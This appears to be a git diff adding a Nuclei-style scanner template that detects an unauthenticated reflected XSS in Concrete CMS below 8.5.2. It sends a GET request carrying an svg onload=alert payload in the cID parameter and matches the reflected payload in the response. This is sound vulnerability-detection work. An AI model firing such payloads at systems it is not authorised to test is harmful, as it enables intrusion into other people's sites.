commit
82a7496b6a
|
@ -0,0 +1,33 @@
|
||||||
|
id: concrete-xss
|
||||||
|
|
||||||
|
info:
|
||||||
|
author: shifacyclewla,hackergautam
|
||||||
|
description: The Concrete CMS < 8.5.2 is vulnerable to Reflected XSS using cID parameter.
|
||||||
|
name: Unauthenticated reflected XSS in preview_as_user function
|
||||||
|
severity: medium
|
||||||
|
tags: concrete,xss,cms
|
||||||
|
reference: |
|
||||||
|
- https://hackerone.com/reports/643442
|
||||||
|
- https://github.com/concrete5/concrete5/pull/7999
|
||||||
|
- https://twitter.com/JacksonHHax/status/1389222207805661187
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><svg/onload=alert("{{randstr}}")>'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '</iframe><svg/onload=alert("{{randstr}}")>'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue